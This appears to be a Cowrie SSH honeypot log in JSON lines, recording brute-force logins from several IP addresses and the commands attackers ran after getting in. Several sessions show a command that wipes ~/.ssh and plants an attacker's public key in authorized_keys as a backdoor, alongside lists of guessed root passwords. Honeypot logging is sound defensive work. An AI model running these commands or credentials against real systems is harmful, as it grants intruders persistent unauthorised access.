{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:44:51.382427Z","src_ip":"24.108.102.132","session":"8a1036daf4ea"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:44:52.551229Z","src_ip":"24.108.102.132","session":"8a1036daf4ea"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":48834,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab56e746f503","protocol":"ssh","message":"New connection: 24.108.102.132:48834 (1.2.3.4:22) [session: ab56e746f503]","sensor":"my-vps","timestamp":"2025-08-26T00:44:52.701591Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:44:52.712377Z","src_ip":"24.108.102.132","session":"ab56e746f503"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:44:52.879919Z","src_ip":"24.108.102.132","session":"ab56e746f503"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:44:53.539417Z","src_ip":"24.108.102.132","session":"ab56e746f503"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:44:53.695802Z","src_ip":"24.108.102.132","session":"00d097fcdd2c"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:44:53.706847Z","src_ip":"24.108.102.132","session":"ab56e746f503"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":55128,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1a1ec0371ab","protocol":"ssh","message":"New connection: 36.89.28.139:55128 (1.2.3.4:22) [session: e1a1ec0371ab]","sensor":"my-vps","timestamp":"2025-08-26T00:45:10.199432Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:45:10.200166Z","src_ip":"36.89.28.139","session":"e1a1ec0371ab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:45:10.386327Z","src_ip":"36.89.28.139","session":"e1a1ec0371ab"}
{"eventid":"cowrie.login.failed","username":"shoutcast","password":"shoutcast","message":"login attempt [shoutcast/shoutcast] failed","sensor":"my-vps","timestamp":"2025-08-26T00:45:11.170982Z","src_ip":"36.89.28.139","session":"e1a1ec0371ab"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:45:12.359744Z","src_ip":"36.89.28.139","session":"e1a1ec0371ab"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":37796,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bf1ab3a1931","protocol":"ssh","message":"New connection: 45.159.112.103:37796 (1.2.3.4:22) [session: 6bf1ab3a1931]","sensor":"my-vps","timestamp":"2025-08-26T00:45:52.587090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:45:52.588022Z","src_ip":"45.159.112.103","session":"6bf1ab3a1931"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:45:52.701016Z","src_ip":"45.159.112.103","session":"6bf1ab3a1931"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":40672,"dst_ip":"1.2.3.4","dst_port":22,"session":"a344637108c3","protocol":"ssh","message":"New connection: 24.108.102.132:40672 (1.2.3.4:22) [session: a344637108c3]","sensor":"my-vps","timestamp":"2025-08-26T00:45:53.055043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:45:53.065884Z","src_ip":"24.108.102.132","session":"a344637108c3"}
{"eventid":"cowrie.login.success","username":"root","password":"meng123456","message":"login attempt [root/meng123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:45:53.193996Z","src_ip":"45.159.112.103","session":"6bf1ab3a1931"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:45:53.232679Z","src_ip":"24.108.102.132","session":"a344637108c3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:45:53.439837Z","src_ip":"45.159.112.103","session":"6bf1ab3a1931"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:45:53.440507Z","src_ip":"45.159.112.103","session":"6bf1ab3a1931"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:45:53.441521Z","src_ip":"45.159.112.103","session":"6bf1ab3a1931"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:45:53.555895Z","src_ip":"45.159.112.103","session":"6bf1ab3a1931"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:45:53.904072Z","src_ip":"45.159.112.103","session":"6bf1ab3a1931"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:45:53.904889Z","src_ip":"45.159.112.103","session":"6bf1ab3a1931"}
{"eventid":"cowrie.login.failed","username":"user2","password":"1111","message":"login attempt [user2/1111] failed","sensor":"my-vps","timestamp":"2025-08-26T00:45:53.908476Z","src_ip":"24.108.102.132","session":"a344637108c3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:45:54.021165Z","src_ip":"45.159.112.103","session":"6bf1ab3a1931"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:45:54.022319Z","src_ip":"45.159.112.103","session":"6bf1ab3a1931"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":37808,"dst_ip":"1.2.3.4","dst_port":22,"session":"5df30ddee203","protocol":"ssh","message":"New connection: 45.159.112.103:37808 (1.2.3.4:22) [session: 5df30ddee203]","sensor":"my-vps","timestamp":"2025-08-26T00:45:54.132975Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:45:54.133952Z","src_ip":"45.159.112.103","session":"5df30ddee203"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:45:54.244382Z","src_ip":"45.159.112.103","session":"5df30ddee203"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:45:54.728141Z","src_ip":"45.159.112.103","session":"5df30ddee203"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:45:55.078732Z","src_ip":"24.108.102.132","session":"a344637108c3"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:45:55.840740Z","src_ip":"45.159.112.103","session":"5df30ddee203"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":37818,"dst_ip":"1.2.3.4","dst_port":22,"session":"30a32234ed0c","protocol":"ssh","message":"New connection: 45.159.112.103:37818 (1.2.3.4:22) [session: 30a32234ed0c]","sensor":"my-vps","timestamp":"2025-08-26T00:45:55.951533Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:45:55.952414Z","src_ip":"45.159.112.103","session":"30a32234ed0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:45:56.066045Z","src_ip":"45.159.112.103","session":"30a32234ed0c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:45:56.559255Z","src_ip":"45.159.112.103","session":"30a32234ed0c"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:45:56.672307Z","src_ip":"45.159.112.103","session":"6bf1ab3a1931"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:45:56.673393Z","src_ip":"45.159.112.103","session":"30a32234ed0c"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":38812,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a0f9726ca7c","protocol":"ssh","message":"New connection: 36.89.28.139:38812 (1.2.3.4:22) [session: 7a0f9726ca7c]","sensor":"my-vps","timestamp":"2025-08-26T00:46:21.034898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:46:21.035810Z","src_ip":"36.89.28.139","session":"7a0f9726ca7c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:46:21.226548Z","src_ip":"36.89.28.139","session":"7a0f9726ca7c"}
{"eventid":"cowrie.login.success","username":"root","password":"get","message":"login attempt [root/get] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:46:22.031948Z","src_ip":"36.89.28.139","session":"7a0f9726ca7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:46:22.476281Z","src_ip":"36.89.28.139","session":"7a0f9726ca7c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:46:22.476947Z","src_ip":"36.89.28.139","session":"7a0f9726ca7c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:46:22.477704Z","src_ip":"36.89.28.139","session":"7a0f9726ca7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:46:22.670132Z","src_ip":"36.89.28.139","session":"7a0f9726ca7c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:46:23.078404Z","src_ip":"36.89.28.139","session":"7a0f9726ca7c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:46:23.079322Z","src_ip":"36.89.28.139","session":"7a0f9726ca7c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:46:23.273298Z","src_ip":"36.89.28.139","session":"7a0f9726ca7c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:46:23.274577Z","src_ip":"36.89.28.139","session":"7a0f9726ca7c"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":38818,"dst_ip":"1.2.3.4","dst_port":22,"session":"36a4c5586346","protocol":"ssh","message":"New connection: 36.89.28.139:38818 (1.2.3.4:22) [session: 36a4c5586346]","sensor":"my-vps","timestamp":"2025-08-26T00:46:23.445266Z"}
